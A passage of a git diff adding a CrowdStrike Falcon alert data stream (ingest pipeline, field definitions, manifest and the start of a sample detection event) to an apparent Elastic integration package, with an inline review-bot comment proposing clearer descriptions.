+ allow_duplicates: false
+ if: ctx.crowdstrike?.alert?.technique != null
+ - rename:
+ field: json.technique_id
+ tag: rename_technique_id
+ target_field: crowdstrike.alert.technique_id
+ ignore_missing: true
+ - script:
+ lang: painless
+ tag: script_to_set_threat_technique_id
+ if: ctx.crowdstrike?.alert?.technique_id != null
+ description: Script to set threat technique ID.
+ source: |
+ def v = ctx.crowdstrike.alert.technique_id;
+ if (v.startsWith("CS")) {
+ v = v.substring(2, v.length());
+ }
+ ctx.threat.technique.id = [v];
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - date:
+ field: json.timestamp
+ tag: date_timestamp
+ target_field: crowdstrike.alert.timestamp
+ formats:
+ - ISO8601
+ if: ctx.json?.timestamp != null && ctx.json.timestamp != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: '@timestamp'
+ tag: set_@timestamp_from_alert_timestamp
+ copy_from: crowdstrike.alert.timestamp
+ ignore_empty_value: true
+ - rename:
+ field: json.tree_id
+ tag: rename_tree_id
+ target_field: crowdstrike.alert.tree_id
+ ignore_missing: true
+ - rename:
+ field: json.tree_root
+ tag: rename_tree_root
+ target_field: crowdstrike.alert.tree_root
+ ignore_missing: true
+ - rename:
+ field: json.triggering_process_graph_id
+ tag: rename_triggering_process_graph_id
+ target_field: crowdstrike.alert.triggering_process_graph_id
+ ignore_missing: true
+ - rename:
+ field: json.type
+ tag: rename_type
+ target_field: crowdstrike.alert.type
+ ignore_missing: true
+ - date:
+ field: json.updated_timestamp
+ tag: date_updated_timestamp
+ target_field: crowdstrike.alert.updated_timestamp
+ formats:
+ - ISO8601
+ if: ctx.json?.updated_timestamp != null && ctx.json.updated_timestamp != ''
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message:
{{{_ingest.on_failure_message}}}'
+ - rename:
+ field: json.user_id
+ tag: rename_user_id
+ target_field: crowdstrike.alert.user_id
+ ignore_missing: true
+ - set:
+ field: user.id
+ tag: set_user_id_from_alert_user_id
+ copy_from: crowdstrike.alert.user_id
+ ignore_empty_value: true
+ - rename:
+ field: json.user_name
+ tag: rename_user_name
+ target_field: crowdstrike.alert.user_name
+ ignore_missing: true
+ - set:
+ field: user.name
+ tag: set_user_name_from_alert_user_name
+ copy_from: crowdstrike.alert.user_name
+ ignore_empty_value: true
+ - append:
+ field: related.user
+ tag: append_user_id_into_related_user
+ value: '{{{user.id}}}'
+ allow_duplicates: false
+ if: ctx.user?.id != null
+ - append:
+ field: related.user
+ tag: append_user_name_into_related_user
+ value: '{{{user.name}}}'
+ allow_duplicates: false
+ if: ctx.user?.name != null
+ - remove:
+ field:
+ - crowdstrike.alert.description
+ - crowdstrike.alert.device.external_ip
+ - crowdstrike.alert.device.hostinfo.domain
+ - crowdstrike.alert.device.hostname
+ - crowdstrike.alert.device.id
+ - crowdstrike.alert.device.mac_address
+ - crowdstrike.alert.device.os_version
+ - crowdstrike.alert.device.platform_name
+ - crowdstrike.alert.filename
+ - crowdstrike.alert.filepath
+ - crowdstrike.alert.id
+ - crowdstrike.alert.parent_details.cmdline
+ - crowdstrike.alert.parent_details.md5
+ - crowdstrike.alert.parent_details.sha256
+ - crowdstrike.alert.parent_details.user_id
+ - crowdstrike.alert.parent_details.user_name
+ - crowdstrike.alert.parent_process_id
+ - crowdstrike.alert.process_id
+ - crowdstrike.alert.severity
+ - crowdstrike.alert.timestamp
+ - crowdstrike.alert.user_id
+ - crowdstrike.alert.user_name
+ - crowdstrike.alert.process_start_time
+ - crowdstrike.alert.process_end_time
+ - crowdstrike.alert.tactic
+ - crowdstrike.alert.technique
+ tag: remove_custom_duplicate_fields
+ ignore_missing: true
+ if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields'))
+ - remove:
+ field: json
+ tag: remove_json
+ ignore_missing: true
+ - remove:
+ field: event.original
+ tag: remove_event_original
+ ignore_missing: true
+ if: ctx.tags == null || !(ctx.tags.contains('preserve_original_event'))
+ - script:
+ tag: script_to_drop_null_values
+ lang: painless
+ source: |-
+ boolean drop(Object o) {
+ if (o == null || o == '') {
+ return true;
+ } else if (o instanceof Map) {
+ ((Map) o).values().removeIf(v -> drop(v));
+ return (((Map) o).size() == 0);
+ } else if (o instanceof List) {
+ ((List) o).removeIf(v -> drop(v));
+ return (((List) o).length == 0);
+ }
+ return false;
+ }
+ drop(ctx);
+ description: Drops null/empty values recursively.
+ - append:
+ field: event.kind
+ value: pipeline_error
+ allow_duplicates: false
+ if: ctx.error?.message != null
+on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: event.kind
+ tag: set_pipeline_error_to_event_kind
+ value: pipeline_error
diff --git a/packages/crowdstrike/data_stream/alert/fields/base-fields.yml b/packages/crowdstrike/data_stream/alert/fields/base-fields.yml
new file mode 100644
index 00000000000..a93aca0ee91
--- /dev/null
+++ b/packages/crowdstrike/data_stream/alert/fields/base-fields.yml
@@ -0,0 +1,20 @@
+- name: data_stream.type
+ type: constant_keyword
+ description: Data stream type.
+- name: data_stream.dataset
+ type: constant_keyword
+ description: Data stream dataset.
+- name: data_stream.namespace
+ type: constant_keyword
+ description: Data stream namespace.
+- name: event.module
+ type: constant_keyword
+ description: Event module.
+ value: crowdstrike
+- name: event.dataset
+ type: constant_keyword
+ description: Event dataset.
+ value: crowdstrike.alert
+- name: '@timestamp'
+ type: date
+ description: Event timestamp.
diff --git a/packages/crowdstrike/data_stream/alert/fields/beats.yml b/packages/crowdstrike/data_stream/alert/fields/beats.yml
new file mode 100644
index 00000000000..b3701b581cf
--- /dev/null
+++ b/packages/crowdstrike/data_stream/alert/fields/beats.yml
@@ -0,0 +1,9 @@
+- name: input.type
+ type: keyword
+ description: Type of filebeat input.
+- name: log.offset
+ type: long
+ description: Log offset.
+- name: tags
+ type: keyword
+ description: User defined tags.
diff --git a/packages/crowdstrike/data_stream/alert/fields/fields.yml b/packages/crowdstrike/data_stream/alert/fields/fields.yml
new file mode 100644
index 00000000000..52db7417203
--- /dev/null
+++ b/packages/crowdstrike/data_stream/alert/fields/fields.yml
@@ -0,0 +1,483 @@
+- name: crowdstrike.alert
+ type: group
+ fields:
+ - name: agent_id
+ type: keyword
+ description: Unique identifier for the CrowdStrike agent.
+ - name: aggregate_id
+ type: keyword
+ description: An aggregate identifier associated with the agent.
+ - name: alleged_filetype
+ type: keyword
+ description: The alleged file type of the detected file.
+ - name: cid
+ type: keyword
+ description: CrowdStrike identifier associated with the device.
+ - name: cloud_indicator
+ type: boolean
+ description: Indicates whether the activity is related to the cloud.
+ - name: cmdline
+ type: keyword
+ description: The command line used to execute the file.
+ - name: composite_id
+ type: keyword
+ description: A composite identifier associated with the device.
+ - name: confidence
+ type: long
+ description: Confidence level associated with the detection.
+ - name: context_timestamp
+ type: date
+ description: Timestamp when the alert was generated.
+ - name: control_graph_id
+ type: keyword
+ description: Identifier associated with the control graph.
+ - name: crawl_edge_ids
+ type: group
+ fields:
+ - name: Sensor
+ type: keyword
+ description: Edge identifiers associated with crawling.
+ - name: crawl_vertex_ids
+ type: group
+ fields:
+ - name: Sensor
+ type: keyword
+ description: Vertex identifiers associated with crawling.
+ - name: crawled_timestamp
+ type: date
+ description: Timestamp indicating when crawling occurred.
+ - name: created_timestamp
+ type: date
+ description: Timestamp indicating when the alert was created.
+ - name: data_domains
+ type: keyword
+ description: Data domains associated with the alert.
+ - name: description
+ type: keyword
+ description: Description of the detected file or activity.
+ - name: device
+ type: group
+ fields:
+ - name: agent_load_flags
+ type: long
+ description: Flags indicating the load status of the agent.
+ - name: agent_local_time
+ type: date
+ description: Local time of the agent.
+ - name: agent_version
+ type: keyword
+ description: Version of the CrowdStrike agent.
+ - name: bios_manufacturer
+ type: keyword
+ description: Manufacturer of the BIOS.
+ - name: bios_version
+ type: keyword
+ description: Version of the BIOS.
+ - name: cid
+ type: keyword
+ description: CrowdStrike identifier associated with the device.
+ - name: config_id_base
+ type: keyword
+ description: Base configuration identifier.
+ - name: config_id_build
+ type: keyword
+ description: Build configuration identifier.
+ - name: config_id_platform
+ type: long
+ description: Platform configuration identifier.
+ - name: external_ip
+ type: ip
+ description: External IP address of the device.
+ - name: first_seen
+ type: date
+ description: Timestamp indicating when the device was first seen.
+ - name: groups
+ type: keyword
+ description: Groups associated with the device.
+ - name: hostinfo
+ type: group
+ fields:
+ - name: active_directory_dn_display
+ type: keyword
+ description: Display name for Active Directory.
+ - name: domain
+ type: keyword
+ description: Domain of the device.
+ - name: hostname
+ type: keyword
+ description: Hostname of the device.
+ - name: id
+ type: keyword
+ description: Unique identifier for the device.
+ - name: last_seen
+ type: date
+ description: Timestamp indicating when the device was last seen.
+ - name: local_ip
+ type: ip
+ description: Local IP address of the device.
+ - name: mac_address
+ type: keyword
+ description: MAC address of the device.
+ - name: machine_domain
+ type: keyword
+ description: Domain of the machine.
+ - name: major_version
+ type: keyword
+ description: Major version of the device.
+ - name: minor_version
+ type: keyword
+ description: Minor version of the device.
+ - name: modified_timestamp
+ type: date
+ description: Timestamp indicating when the device was last modified.
+ - name: os_version
+ type: keyword
+ description: Operating system version.
+ - name: ou
+ type: keyword
+ description: Organizational unit information.
+ - name: platform_id
+ type: keyword
+ description: Platform identifier.
+ - name: platform_name
+ type: keyword
+ description: Name of the platform.
+ - name: pod_labels
+ type: keyword
+ description: Labels associated with the device.
+ - name: product_type
+ type: keyword
+ description: Type of product associated with the device.
+ - name: product_type_desc
+ type: keyword
+ description: Description of the product type.
+ - name: site_name
+ type: keyword
+ description: Name of the site associated with the device.
+ - name: status
+ type: keyword
+ description: Status of the device.
+ - name: system_manufacturer
+ type: keyword
+ description: System manufacturer of the device.
+ - name: system_product_name
+ type: keyword
+ description: System product name.
+ - name: falcon_host_link
+ type: keyword
+ description: Link to CrowdStrike Falcon host activity.
+ - name: filename
+ type: keyword
+ description: Name of the detected file.
+ - name: filepath
+ type: keyword
+ description: Path to the detected file.
+ - name: grandparent_details
+ type: group
+ fields:
+ - name: cmdline
+ type: keyword
+ description: Command line of the grandparent process.
+ - name: filename
+ type: keyword
+ description: Filename of the grandparent process.
+ - name: filepath
+ type: keyword
+ description: Filepath of the grandparent process.
+ - name: local_process_id
+ type: keyword
+ description: Local process ID of the grandparent process.
+ - name: md5
+ type: keyword
+ description: grandparent_details.md5 MD5 hash of the grandparent process.
+ - name: process_graph_id
+ type: keyword
+ description: Graph ID of the grandparent process.
+ - name: process_id
+ type: keyword
+ description: Process ID of the grandparent process.
+ - name: sha256
+ type: keyword
+ description: grandparent_details.sha256 SHA256 hash of the grandparent process.
+ - name: timestamp
+ type: date
+ description: Timestamp of the grandparent process.
+ - name: user_graph_id
+ type: keyword
+ description: Graph ID of the grandparent process user.
+ - name: user_id
+ type: keyword
+ description: User ID of the grandparent process.
+ - name: user_name
+ type: keyword
+ description: Username of the grandparent process.
+ - name: has_script_or_module_ioc
+ type: boolean
+ description: Indicates if there is a script or module IOC (Indicator of Compromise).
+ - name: id
+ type: keyword
+ description: Identifier associated with the alert.
+ - name: indicator_id
+ type: keyword
+ description: Identifier of the detected indicator.
+ - name: ioc_context
+ type: group
+ fields:
+ - name: cmdline
+ type: keyword
+ description: Command Line of the IOC context.
+ - name: ioc_description
+ type: keyword
+ description: Description of the IOC context.
+ - name: ioc_source
+ type: keyword
+ description: Source of the IOC.
+ - name: ioc_type
+ type: keyword
+ description: Type of IOC.
+ - name: ioc_value
+ type: keyword
+ description: Value of the IOC.
+ - name: md5
+ type: keyword
+ description: ioc_context.md5 MD5 hash associated with the IOC.
+ - name: sha256
+ type: keyword
+ description: ioc_context.sha256 SHA256 hash associated with the IOC.
+ - name: type
+ type: keyword
+ description: Type of IOC context.
+ - name: ioc_values
+ type: keyword
+ description: Values associated with the IOC.
+ - name: is_synthetic_quarantine_disposition
+ type: boolean
+ description: Indicates if the quarantine disposition is synthetic.
+ - name: local_process_id
+ type: keyword
+ description: Local process ID associated with the alert.
+ - name: logon_domain
+ type: keyword
+ description: Domain associated with the logon.
+ - name: md5
+ type: keyword
+ description: md5 MD5 hash associated with the detected file.
+ - name: name
+ type: keyword
+ description: Name of the detection.
+ - name: objective
+ type: keyword
+ description: Objective of the detection.
+ - name: parent_details
+ type: group
+ fields:
+ - name: cmdline
+ type: keyword
+ description: Command line of the parent process.
+ - name: filename
+ type: keyword
+ description: Filename of the parent process.
+ - name: filepath
+ type: keyword
+ description: Filepath of the parent process.
+ - name: local_process_id
+ type: keyword
+ description: Local process ID of the parent process.
+ - name: md5
+ type: keyword
+ description: parent_details.md5 MD5 hash of the parent process.
+ - name: process_graph_id
+ type: keyword
+ description: Graph ID of the parent process.
+ - name: process_id
+ type: keyword
+ description: Process ID of the parent process.
+ - name: sha256
+ type: keyword
+ description: parent_details.sha256 SHA256 hash of the parent process.
+ - name: timestamp
+ type: date
+ description: Timestamp of the parent process.
+ - name: user_graph_id
+ type: keyword
+ description: Graph ID of the parent process user.
+ - name: user_id
+ type: keyword
+ description: User ID of the parent process.
+ - name: user_name
+ type: keyword
+ description: Username of the parent process.
+ - name: parent_process_id
+ type: keyword
+ description: Process ID of the parent process.
+ - name: pattern_disposition
+ type: long
+ description: Disposition of the pattern.
+ - name: pattern_disposition_description
+ type: keyword
+ description: Description of the pattern disposition.
+ - name: pattern_disposition_details
+ type: group
+ fields:
+ - name: blocking_unsupported_or_disabled
+ type: boolean
+ description: Indicates if blocking is unsupported or disabled.
+ - name: bootup_safeguard_enabled
+ type: boolean
+ description: Indicates if the bootup safeguard is enabled.
+ - name: critical_process_disabled
+ type: boolean
+ description: Indicates if the critical process is disabled.
+ - name: detect
+ type: boolean
+ description: Indicates if the pattern detected the threat.
+ - name: fs_operation_blocked
+ type: boolean
+ description: Indicates if file system operation is blocked.
+ - name: handle_operation_downgraded
+ type: boolean
+ description: Indicates if handle operation is downgraded.
+ - name: inddet_mask
+ type: boolean
+ description: Indicates if the indicator detection mask is true.
+ - name: indicator
+ type: boolean
+ description: Indicates if the pattern detected an indicator.
+ - name: kill_action_failed
+ type: boolean
+ description: Indicates if the kill action failed.
+ - name: kill_parent
+ type: boolean
+ description: Indicates if the parent process was killed.
+ - name: kill_process
+ type: boolean
+ description: Indicates if the process was killed.
+ - name: kill_subprocess
+ type: boolean
+ description: Indicates if the subprocess was killed.
+ - name: operation_blocked
+ type: boolean
+ description: Indicates if the operation is blocked.
+ - name: policy_disabled
+ type: boolean
+ description: Indicates if the policy is disabled.
+ - name: process_blocked
+ type: boolean
+ description: Indicates if the process is blocked.
+ - name: quarantine_file
+ type: boolean
+ description: Indicates if the file is quarantined.
+ - name: quarantine_machine
+ type: boolean
+ description: Indicates if the machine is quarantined.
+ - name: registry_operation_blocked
+ type: boolean
+ description: Indicates if registry operation is blocked.
+ - name: rooting
+ type: boolean
+ description: Indicates if rooting is detected.
+ - name: sensor_only
+ type: boolean
+ description: Indicates if the detection is based on the sensor only.
+ - name: suspend_parent
+ type: boolean
+ description: Indicates if the parent process was suspended.
+ - name: suspend_process
+ type: boolean
+ description: Indicates if the process was suspended.
+ - name: pattern_id
+ type: keyword
+ description: Identifier associated with the pattern.
+ - name: platform
+ type: keyword
+ description: Platform associated with the alert.
+ - name: poly_id
+ type: keyword
+ description: Identifier associated with polymorphic behavior.
+ - name: process_end_time
+ type: date
+ description: Timestamp indicating when the process ended.
+ - name: process_id
+ type: keyword
+ description: Identifier associated with the process.
+ - name: process_start_time
+ type: date
+ description: Timestamp indicating when the process started.
+ - name: product
+ type: keyword
+ description: Product associated with the detection.
+ - name: quarantined_files
+ type: group
+ fields:
+ - name: filename
+ type: keyword
+ description: Filename of quarantined files.
+ - name: id
+ type: keyword
+ description: Identifier of quarantined files.
+ - name: sha256
+ type: keyword
+ description: quarantined_files.sha256 SHA256 hash of quarantined files.
+ - name: state
+ type: keyword
+ description: State of quarantined files.
+ - name: scenario
+ type: keyword
+ description: Scenario associated with the detection.
+ - name: severity
+ type: long
+ description: Severity level associated with the detection.
+ - name: sha1
+ type: keyword
+ description: sha1 SHA1 hash associated with the detected file.
+ - name: sha256
+ type: keyword
+ description: sha256 SHA256 hash associated with the detected file.
+ - name: show_in_ui
+ type: boolean
+ description: Indicates if the alert should be displayed in the user interface.
+ - name: source_products
+ type: keyword
+ description: Products associated with the data source.
+ - name: source_vendors
+ type: keyword
+ description: Vendors associated with the data source.
+ - name: status
+ type: keyword
+ description: Status of the alert.
+ - name: tactic
+ type: keyword
+ description: Tactic associated with the detection.
+ - name: tactic_id
+ type: keyword
+ description: Identifier associated with the tactic.
+ - name: technique
+ type: keyword
+ description: Technique associated with the detection.
+ - name: technique_id
+ type: keyword
+ description: Identifier associated with the technique.
+ - name: timestamp
+ type: date
+ description: Timestamp associated with the alert.
+ - name: tree_id
+ type: keyword
+ description: Identifier associated with the tree.
+ - name: tree_root
+ type: keyword
+ description: Root identifier associated with the tree.
+ - name: triggering_process_graph_id
+ type: keyword
+ description: Graph ID of the triggering process.
+ - name: type
+ type: keyword
+ description: Type associated with the alert.
+ - name: updated_timestamp
+ type: date
+ description: Timestamp indicating when the alert was last updated.
+ - name: user_id
+ type: keyword
+ description: User ID associated with the alert.
+ - name: user_name
+ type: keyword
+ description: Username associated with the alert.
diff --git a/packages/crowdstrike/data_stream/alert/manifest.yml b/packages/crowdstrike/data_stream/alert/manifest.yml
new file mode 100644
index 00000000000..1d6866d48b5
--- /dev/null
+++ b/packages/crowdstrike/data_stream/alert/manifest.yml
@@ -0,0 +1,81 @@
+title: Collect Alert logs from CrowdStrike.
+type: logs
+streams:
+ - input: cel
+ title: Falcon Alerts
+ description: Collect Unified Alerts from CrowdStrike Falcon Intelligence.
+ enabled: false
+ template_path: cel.yml.hbs
+ vars:
+ - name: initial_interval
+ type: text
+ title: Initial Interval
+ description: How far back to pull the Alert logs from CrowdStrike. Supported units for this parameter are h/m/s.
+ multi: false
+ required: true
+ show_user: true
+ default: 24h
+ - name: interval
+ type: text
+ title: Interval
+ description: Duration between requests to the CrowdStrike API. Supported units for this parameter are h/m/s.
+ default: 5m
+ multi: false
+ required: true
+ show_user: true
+ - name: batch_size
+ type: integer
+ title: Batch Size
+ description: Batch size for the response of the CrowdStrike API. It must be between 1 - 10000.
+ default: 10000
+ multi: false
+ required: true
+ show_user: false
+ - name: http_client_timeout
+ type: text
+ title: HTTP Client Timeout
+ description: Duration before declaring that the HTTP client connection has timed out. Valid time units are ns, us, ms, s, m, h.
+ multi: false
+ required: true
+ show_user: false
+ default: 30s
+ - name: enable_request_tracer
+ type: bool
+ title: Enable request tracing
+ multi: false
+ required: false
+ show_user: false
+ description: The request tracer logs requests and responses to the agent's local file-system for debugging configurations. Enabling this request tracing compromises security and should only be used for debugging. See [documentation](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-input-cel.html#_resource_tracer_filename) for details.
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - crowdstrike-alert
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: preserve_duplicate_custom_fields
+ required: true
+ show_user: false
+ title: Preserve duplicate custom fields
+ description: Preserve crowdstrike.alert fields that were copied to Elastic Common Schema (ECS) fields.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
diff --git a/packages/crowdstrike/data_stream/alert/sample_event.json b/packages/crowdstrike/data_stream/alert/sample_event.json
new file mode 100644
index 00000000000..cb482cacc6a
--- /dev/null
+++ b/packages/crowdstrike/data_stream/alert/sample_event.json
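Review bot: The stream description `description: Collect Unified Alerts from CrowdStrike Falcon Intelligence.` attributes this data to Falcon Intelligence (the threat-intel product), but the sample event added in this same change is an endpoint NGAV detection (`source_products: FalconInsight`, `data_domains: Endpoint`) and the new test log carries identity-protection detections, so the wording will misdirect users choosing the stream; suggest `description: Collect unified alerts (endpoint, identity and other Falcon modules) from the CrowdStrike Falcon platform.` The `enable_request_tracer` description says enabling it "compromises security" without saying how, which makes the warning easy to dismiss: for this stream the traced response bodies hold hostnames, usernames and SIDs, command lines and external IPs, and, if the CEL program performs the OAuth2 exchange itself, presumably the client credentials and bearer token as well. I would append `The trace files contain the raw API requests and responses, including host and user identities, command lines and any credentials exchanged; delete them once debugging is complete.` Separately, the `batch_size` description promises a 1-10000 range that nothing in the manifest enforces, so if the CEL program passes the value straight through, an out-of-range setting surfaces only as an API error at runtime; stating that in the description (`Values outside this range are rejected by the CrowdStrike API.`) would save an operator a debugging round-trip.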
@@ -0,0 +1,336 @@ +{ + "@timestamp": "2023-11-03T18:00:22.328Z", + "agent": { + "ephemeral_id": "532c45c9-f01e-40e0-9406-8997b9a2b29c", + "id": "14bc069f-0d77-4637-b5c7-44a24faa08d5", + "name": "docker-fleet-agent", + "type": "filebeat", + "version": "8.12.0" + }, + "crowdstrike": { + "alert": { + "agent_id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "aggregate_id": "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "alleged_filetype": "exe", + "cid": "92012896127c4a948236ba7601b886b0", + "cloud_indicator": false, + "cmdline": "\"C:\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe\"", + "composite_id": "92012896127c4a8236ba7601b886b0:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "confidence": 10, + "context_timestamp": "2023-11-03T18:00:31.000Z", + "control_graph_id": "ctg:2ce4127b334ad4adc8c1c54dbfec4b:163208931778", + "crawl_edge_ids": { + "Sensor": [ + "KZcZ=__;K&cmqQ]Z=W,QK4W.9(rBfs\\gfmjTblqI^F-_oNnAWQ&-o0:dR/>>2JIVMD36[+=kiQDRm.bB?;d\"V0JaQlaltC59Iq6nM?6`>ZAs+LbOJ9p9A;9'WV9^H3XEMs8N", + "KZcZA__;?\"cmott@m_k)MSZ^+C?.cg92t[f!>*b9WLY@H!V0N,BJsNSTD:?/+fY';ea%iM\"__\"59K'R?_=`'`rK/'hA\"r+L5i-*Ut5PI!!*'!", + "N6CUF__;K!d$:[C93.?=/5(`5KnM]!L#UbnSY5HOHc#[6A&FE;(naXB4h/OG\"%MDAR=fo41Z]rXc\"J-\\&&V8UW.?I6V*G+,))Ztu_IuCMV#ZJ:QDJ_EjQmjiX#HENY'WD0rVAV$Gl6_+0e:2$8D)):.LUs+8-S$L!!!$!rr", + "N6CUF__;K!d$:\\N43JV0AO56@6D0$!na(s)d.dQ'iI1*uiKt#j?r\"X'\\AtNML2_C__7ic6,8Dc[F<0NTUGtl%HD#?/Y)t8!1X.;G!*FQ9GP-ukQn`6I##&$^81(P+hN*-#rf/cUs)Wb\"<_/?I'[##WMh'H[Rcl+!!<<'", + "N6L[G__;K!d\"qhT7k?[D\"Bk:5s%+=>#DM0j$_44ZjO9q*d!YLuHhkq!3>3tpi>OPYZp9]5f1#/AlRZL06`/I6cl\"d.&=To@9kS!prs8N" + ] + }, + "crawl_vertex_ids": { + "Sensor": [ + "aggind:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + "ctg:2ce412d17b334ad4adc8c1c54dbfec4b:163208931778", + 
"ind:2ce412d17b34ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:0b25d56bd2b4d8a6df45beff7be165117fbf7ba6ba2c07744f039143866335e4", + "mod:2ce412d17b4ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "mod:2ce412d17b334ad4adc8c1c54dbfec4b:caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "pid:2ce412d17b33d4adc8c1c54dbfec4b:392734873135", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392736520876", + "pid:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993", + "quf:2ce412d17b334ad4adc8c1c54dbfec4b:b26a6791b72753d2317efd5e1363d93fdd33e611c8b9e08a3b24ea4d755b81fd", + "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425" + ] + }, + "crawled_timestamp": "2023-11-03T19:00:23.985Z", + "created_timestamp": "2023-11-03T18:01:23.995Z", + "data_domains": [ + "Endpoint" + ], + "description": "ThisfilemeetstheAdware/PUPAnti-malwareMLalgorithm'slowest-confidencethreshold.", + "device": { + "agent_load_flags": 0, + "agent_local_time": "2023-10-12T03:45:57.753Z", + "agent_version": "7.04.17605.0", + "bios_manufacturer": "ABC", + "bios_version": "F8CN42WW(V2.05)", + "cid": "92012896127c4a948236ba7601b886b0", + "config_id_base": "65994763", + "config_id_build": "17605", + "config_id_platform": 3, + "external_ip": "81.2.69.142", + "first_seen": "2023-04-07T09:36:36.000Z", + "groups": [ + "18704e21288243b58e4c76266d38caaf" + ], + "hostinfo": { + "active_directory_dn_display": [ + "WinComputers", + "WinComputers\\ABC" + ], + "domain": "ABC.LOCAL" + }, + "hostname": "ABC709-1175", + "id": "2ce412d17b334ad4adc8c1c54dbfec4b", + "last_seen": "2023-11-03T17:51:42.000Z", + "local_ip": "81.2.69.142", + "mac_address": "AB-21-48-61-05-B2", + "machine_domain": "ABC.LOCAL", + "major_version": "10", + "minor_version": "0", + "modified_timestamp": "2023-11-03T17:53:43.000Z", + "os_version": "Windows11", + "ou": [ + "ABC", + "WinComputers" + ], + "platform_id": "0", + "platform_name": 
"Windows", + "product_type": "1", + "product_type_desc": "Workstation", + "site_name": "Default-First-Site-Name", + "status": "normal", + "system_manufacturer": "LENOVO", + "system_product_name": "20VE" + }, + "falcon_host_link": "https://falcon.us-2.crowdstrike.com/activity-v2/detections/dhjffg:ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "filename": "openvpn-abc-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "filepath": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "grandparent_details": { + "cmdline": "C:\\Windows\\system32\\userinit.exe", + "filename": "userinit.exe", + "filepath": "\\Device\\HarddiskVolume3\\Windows\\System32\\userinit.exe", + "local_process_id": "4328", + "md5": "b07f77fd3f9828b2c9d61f8a36609741", + "process_graph_id": "pid:2ce412d17b334ad4adc8c1c54dbfec4b:392734873135", + "process_id": "392734873135", + "sha256": "caef4ae19056eeb122a0540508fa8984cea960173ada0dc648cb846d6ef5dd33", + "timestamp": "2023-10-30T16:49:19.000Z", + "user_graph_id": "uid:2ce412d17b334ad4adc8c1c54dbfec4b:S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_id": "S-1-5-21-1909377054-3469629671-4104191496-4425", + "user_name": "yuvraj.mahajan" + }, + "has_script_or_module_ioc": true, + "id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "indicator_id": "ind:2ce412d17b334ad4adc8c1c54dbfec4b:399748687993-5761-42627600", + "ioc_context": [ + { + "ioc_description": "\\Device\\HarddiskVolume3\\Users\\yuvraj.mahajan\\AppData\\Local\\Temp\\Temp3cc4c329-2896-461f-9dea-88009eb2e8fb_pfSenseFirewallOpenVPNClients-20230823T120504Z-001.zip\\pfSenseFirewallOpenVPNClients\\Windows\\openvpn-cds-pfSense-UDP4-1194-pfsense-install-2.6.5-I001-amd64.exe", + "ioc_source": "library_load", + 
